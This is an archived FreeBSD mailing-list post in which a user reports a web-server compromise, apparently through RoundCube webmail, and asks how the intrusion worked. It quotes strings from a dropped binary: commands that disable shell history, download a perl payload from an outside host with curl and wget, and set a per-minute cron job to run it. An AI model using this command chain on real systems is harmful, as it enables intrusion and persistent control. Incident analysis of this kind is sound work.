Colin Brace wrote: > > ahhhhh, another directory found in /tmp with files written by www called > .bash/ Contents here: > > http://silenceisdefeat.com/~cbrace/www_badstuff-3.gz > Apropos of the contents of the above, a correspondent writes:
[...] running 'strings' on /tmp/owned will show "HISTFILE=/dev/null cd /tmp;curl -s -O http://www.tirnaveni.org/tmpfile 2>&1 >/dev/null cd /tmp;wget -b http://www.tirnaveni.org/tmpfile 2>&1 >/dev/null echo '*/1 * * * * perl /tmp/tmpfile' >cron.job crontab cron.job rm -rf cron.job chmod 0100 /tmp/tmpfile 2>&1 >/dev/null perl /tmp/tmpfile 2>&1 >/dev/null" [...] So this would be the original mischief-maker. Just out of curiousity, can someone explain to me in basic terms how an intruder exploits a vulnerability such as apparently existed on my system (the RoundCube webmail package was apparently the culprit) to place the binary file "owned" in /tmp and execute it? Thanks ----- Colin Brace Amsterdam http://lim.nl -- View this message in context: http://www.nabble.com/what-www-perl-script-is-running--tp25112050p25167487.html Sent from the freebsd-questions mailing list archive at Nabble.com. _______________________________________________ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to "freebsd-questions-unsubscr...@freebsd.org"
